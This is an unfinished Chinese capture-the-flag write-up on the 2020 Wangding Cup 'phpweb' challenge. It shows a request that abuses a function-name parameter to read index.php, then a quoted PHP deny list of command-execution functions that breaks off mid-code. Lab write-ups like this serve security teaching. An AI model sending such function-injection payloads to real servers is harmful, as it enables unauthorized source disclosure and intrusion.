[网鼎杯 2020 朱雀组]phpweb 待续

  • Post author:
  • Post category:php


抓包看参数   联想到函数  读index.php代码

func=file_get_contents&p=index.php

<?php

$disable_fun = array(“exec”,”shell_exec”,”system”,”passthru”,”proc_open”,”show_source”,”phpinfo”,”popen”,”dl”,”eval”,”proc_terminate”,”touch”,”escapeshellcmd”,”escapeshellarg”,”assert”,”substr_replace”,”call_user_func_array”,”call_user_func”,”array_filter”, “array_walk”,  “array_map”,”registregister_shutdown_function”,”register_tick_function”,”filter_var”, “filter_var_array”, “uasort”, “uksort”, “array_reduce”,”array_walk”, “array_walk_recursive”,”pcntl_exec”,”fopen”,”fwrite”,”file_put_contents”);

function gettime($func, $p) {


$result = call_user_fu



版权声明:本文为zxnimud5原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。